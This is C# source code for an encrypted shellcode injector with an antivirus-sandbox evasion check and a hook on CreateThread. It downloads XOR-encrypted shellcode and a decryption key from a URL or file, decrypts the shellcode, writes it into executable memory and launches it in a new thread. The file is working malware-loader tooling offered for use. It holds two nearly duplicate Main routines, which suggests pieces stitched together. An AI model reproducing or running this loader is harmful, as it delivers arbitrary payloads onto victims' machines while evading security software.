internal static void InstallHook()
{
HookedInstance = HookedCreateThread;
OriginalInstance = Marshal.GetDelegateForFunctionPointer <CreateThreadDelegate>(MemUtils.GetFunctionAddress("Kernel32.dll", "CreateThread"));
pDetour = new Detour(MemUtils.GetFunctionAddress("Kernel32.dll", "CreateThread"), Marshal.GetFunctionPointerForDelegate(HookedInstance));
pDetour.Install();
Console.WriteLine("Installed CreateThread Hook");
}
// Main
public static void Main()
{
// Inputs for usage
Boolean RunAVEvasion = true; // Set to false to skip it
string KeySource = ""; // http(s) url OR plaintext OR file location
uint TimeToWait = 0xFFFFFFFF; // Time to wait for the new thread of xor-decrypt key
string ShellcodeSource = ""; // http(s) url OR file location, leave blank to use shellcode from array
byte[] ShellcodeEncrypted = {}; // Xor-encrypted shellcode array to use
/////////////////////////////////////////////
// DON't MODIFY BELOW THINGS FOR EVERYDAY USE
/////////////////////////////////////////////
// Check if running in AV Sandbox
if (RunAVEvasion)
{
Console.WriteLine("Checking if running in an AV sandbox...");
if (Heuristics.IsRunningInAVSandbox())
{
return;
}
}
// Get the encrypted shellcode
if (ShellcodeEncrypted.Length == 0)
{
try
{
if (ShellcodeSource.StartsWith("http://") || (ShellcodeSource.StartsWith("https://")))
{
Console.Write("Downloading xor-encrypted shellcode: ");
WebClient WC = new WebClient();
ShellcodeEncrypted = WC.DownloadData(ShellcodeSource);
Console.Write("DONE !");
}
else if (File.Exists(ShellcodeSource))
{
Console.Write("Reading xor-encrypted shellcode from file: ");
ShellcodeEncrypted = File.ReadAllBytes(ShellcodeSource);
Console.Write("DONE !");
}
else
{
throw new Exception();
}
Console.WriteLine(string.Format(" ({0} bytes)", ShellcodeEncrypted.Length));
}
catch
{
Console.WriteLine("FAILED !");
return;
}
}
// Get the decryption key
byte[] DecryptionKey;
try
{
if (KeySource.StartsWith("http://") || (KeySource.StartsWith("https://")))
{
Console.Write("Fetching decryption key: ");
WebClient WC = new WebClient();
DecryptionKey = WC.DownloadData(KeySource);
Console.Write("DONE !");
}
else if (File.Exists(KeySource))
{
Console.Write("Reading decryption key from file: ");
DecryptionKey = File.ReadAllBytes(KeySource);
Console.Write("DONE !");
}
else
{
Console.Write("Reading decryption key from argument: ");
DecryptionKey = Encoding.UTF8.GetBytes(KeySource);
Console.Write("DONE !");
}
Console.WriteLine(string.Format(" ({0} bytes)", DecryptionKey.Length));
}
catch
{
Console.WriteLine("FAILED !");
return;
}
// Decrypt shellcode
Console.Write("Decrypting shellcode: ");
IntPtr BytesWritten = IntPtr.Zero;
byte[] ShellcodeDecrypted = new byte[ShellcodeEncrypted.Length];
for (int i = 0; i < ShellcodeDecrypted.Length; i++)
{
ShellcodeDecrypted[i] = (byte)(DecryptionKey[i % DecryptionKey.Length] ^ ShellcodeEncrypted[i]);
}
Console.WriteLine("DONE");
// Get necessary WinApi functions
IntPtr VirtualAllocAddr = IntPtr.Zero, CreateThreadAddr = IntPtr.Zero, WaitForSingleObjectAddr = IntPtr.Zero;
GetFunctionAddreses(ref VirtualAllocAddr, ref CreateThreadAddr, ref WaitForSingleObjectAddr);
if ((VirtualAllocAddr == IntPtr.Zero) || (CreateThreadAddr == IntPtr.Zero) || (WaitForSingleObjectAddr == IntPtr.Zero))
{
Console.WriteLine("Failed to derive necessary WinApi functions");
return;
}
VirtualAllocDelegate VirtualAlloc = (VirtualAllocDelegate)Marshal.GetDelegateForFunctionPointer(VirtualAllocAddr, typeof(VirtualAllocDelegate));
CreateThreadDelegate CreateThread = (CreateThreadDelegate)Marshal.GetDelegateForFunctionPointer(CreateThreadAddr, typeof(CreateThreadDelegate));
WaitForSingleObjectDelegate WaitForSingleObject = (WaitForSingleObjectDelegate)Marshal.GetDelegateForFunctionPointer(WaitForSingleObjectAddr, typeof(WaitForSingleObjectDelegate));
// Inject shellcode
try
{
Console.Write("Injecting shellcode in current process: ");
// Allocate memory for shellcode
IntPtr AllocatedMemoryP = VirtualAlloc(IntPtr.Zero, (uint)ShellcodeDecrypted.Length, 0x1000 | 0x2000, 0x40);
if (AllocatedMemoryP == IntPtr.Zero)
{
Console.WriteLine(string.Format("Error {0} allocating memory", GetLastError()));
return;
}
// Copy shellcode to allocated memory
Marshal.Copy(ShellcodeDecrypted, 0, AllocatedMemoryP, ShellcodeDecrypted.Length);
Console.WriteLine("DONE!");
// Start execution of the shellcode
Console.Write("Running shellcode: ");
IntPtr NewThreadH = CreateThread(IntPtr.Zero, 0, AllocatedMemoryP, IntPtr.Zero, 0, IntPtr.Zero);
if (NewThreadH == IntPtr.Zero)
{
Console.WriteLine(string.Format("Error {0} creating new thread", GetLastError()));
return;
}
Console.WriteLine("DONE");
// Wait for thread
if (TimeToWait == 0xFFFFFFFF)
{
Console.WriteLine("Waiting indefinitely for newly spawned thread...");
}
else
{
Console.WriteLine(string.Format("Waiting {0} miliseconds for newly spawned thread...", TimeToWait));
}
WaitForSingleObject(NewThreadH, TimeToWait);
}
catch (Exception exception)
{
Console.WriteLine(string.Format("\n\n{0}", exception.Message));
}
}
// Main
public static void Main(string[] args)
{
// XorEncryptedShellcodeInjector <Shellcode_source> <key_to_decrypt> [--skip-av-sandbox-check] [miliseconds]
// Help section
string WholeArg = "";
for (int i = 0; i < args.Length; i++)
{
WholeArg += args.GetValue(i);
}
if (WholeArg.Contains("--help-detailed"))
{
PrintDetailedHelp();
return;
}
else if ((args.Length < 2) || WholeArg.ToLower().Contains("--help") || WholeArg.ToLower().Contains("-h"))
{
PrintUsage();
return;
}
// Check if running in AV Sandbox
if (!WholeArg.Contains("--skip-av-sandbox-check"))
{
Console.WriteLine("Checking if running in an AV sandbox...");
if (Heuristics.IsRunningInAVSandbox())
{
return;
}
}
// Parse args
string KeySource = args[1];
string ShellcodeSource = args[0];
uint TimeToWait = 0xFFFFFFFF;
// Get thread waiting time
if (args.Length > 2)
{
if (IsNumeric(args[2]))
{
TimeToWait = uint.Parse(args[2]);
}
else if (IsNumeric(args[3]))
{
TimeToWait = uint.Parse(args[3]);
}
}
// Get the encrypted shellcode
byte[] ShellcodeEncrypted;
try
{
if (ShellcodeSource.StartsWith("http://") || (ShellcodeSource.StartsWith("https://")))
{
Console.Write("Downloading xor-encrypted shellcode: ");
WebClient WC = new WebClient();
ShellcodeEncrypted = WC.DownloadData(ShellcodeSource);
Console.Write("DONE !");
}
else if (File.Exists(ShellcodeSource))
{
Console.Write("Reading xor-encrypted shellcode from file: ");
ShellcodeEncrypted = File.ReadAllBytes(ShellcodeSource);
Console.Write("DONE !");
}
else
{
Console.WriteLine("Converting xor-encrypted shellcode from base64 argument: ");
ShellcodeEncrypted = Convert.FromBase64String(ShellcodeSource);
Console.Write("DONE !");
}
Console.WriteLine(string.Format(" ({0} bytes)", ShellcodeEncrypted.Length));
}
catch
{
Console.WriteLine("FAILED !");
return;
}
// Get the decryption key
byte[] DecryptionKey;
try
{
if (KeySource.StartsWith("http://") || (KeySource.StartsWith("https://")))
{
Console.Write("Fetching decryption key: ");
WebClient WC = new WebClient();
DecryptionKey = WC.DownloadData(KeySource);
Console.Write("DONE !");
}
else if (File.Exists(KeySource))
{
Console.Write("Reading decryption key from file: ");
DecryptionKey = File.ReadAllBytes(KeySource);
Console.Write("DONE !");
}
else
{
Console.Write("Reading decryption key from argument: ");
DecryptionKey = Encoding.UTF8.GetBytes(KeySource);
Console.Write("DONE !");
}
Console.WriteLine(string.Format(" ({0} bytes)", DecryptionKey.Length));
}
catch
{
Console.WriteLine("FAILED !");
return;
}
// Decrypt shellcode
Console.Write("Decrypting shellcode: ");
IntPtr BytesWritten = IntPtr.Zero;
byte[] ShellcodeDecrypted = new byte[ShellcodeEncrypted.Length];
for (int i = 0; i < ShellcodeDecrypted.Length; i++)
{
ShellcodeDecrypted[i] = (byte)(DecryptionKey[i % DecryptionKey.Length] ^ ShellcodeEncrypted[i]);
}
Console.WriteLine("DONE");
// Get necessary WinApi functions
IntPtr VirtualAllocAddr = IntPtr.Zero, CreateThreadAddr = IntPtr.Zero, WaitForSingleObjectAddr = IntPtr.Zero;
GetFunctionAddreses(ref VirtualAllocAddr, ref CreateThreadAddr, ref WaitForSingleObjectAddr);
if ((VirtualAllocAddr == IntPtr.Zero) || (CreateThreadAddr == IntPtr.Zero) || (WaitForSingleObjectAddr == IntPtr.Zero))
{
Console.WriteLine("Failed to derive necessary WinApi functions");
return;
}
VirtualAllocDelegate VirtualAlloc = (VirtualAllocDelegate)Marshal.GetDelegateForFunctionPointer(VirtualAllocAddr, typeof(VirtualAllocDelegate));
CreateThreadDelegate CreateThread = (CreateThreadDelegate)Marshal.GetDelegateForFunctionPointer(CreateThreadAddr, typeof(CreateThreadDelegate));
WaitForSingleObjectDelegate WaitForSingleObject = (WaitForSingleObjectDelegate)Marshal.GetDelegateForFunctionPointer(WaitForSingleObjectAddr, typeof(WaitForSingleObjectDelegate));
// Inject shellcode
try
{
Console.Write("Injecting shellcode in current process: ");
// Allocate memory for shellcode
IntPtr AllocatedMemoryP = VirtualAlloc(IntPtr.Zero, (uint)ShellcodeDecrypted.Length, 0x1000 | 0x2000, 0x40);
if (AllocatedMemoryP == IntPtr.Zero)
{
Console.WriteLine(string.Format("Error {0} allocating memory", GetLastError()));
return;
}
// Copy shellcode to allocated memory
Marshal.Copy(ShellcodeDecrypted, 0, AllocatedMemoryP, ShellcodeDecrypted.Length);
Console.WriteLine("DONE!");
// Start execution of the shellcode
Console.Write("Running shellcode: ");
IntPtr NewThreadH = CreateThread(IntPtr.Zero, 0, AllocatedMemoryP, IntPtr.Zero, 0, IntPtr.Zero);
if (NewThreadH == IntPtr.Zero)
{
Console.WriteLine(string.Format("Error {0} creating new thread", GetLastError()));
return;
}
Console.WriteLine("DONE");
// Wait for thread
if (TimeToWait == 0xFFFFFFFF)
{
Console.WriteLine("Waiting indefinitely for newly spawned thread...");
}
else
{
Console.WriteLine(string.Format("Waiting {0} miliseconds for newly spawned thread...", TimeToWait));
}
WaitForSingleObject(NewThreadH, TimeToWait);
}
catch (Exception exception)
{
Console.WriteLine(string.Format("\n\n{0}", exception.Message));
}
}
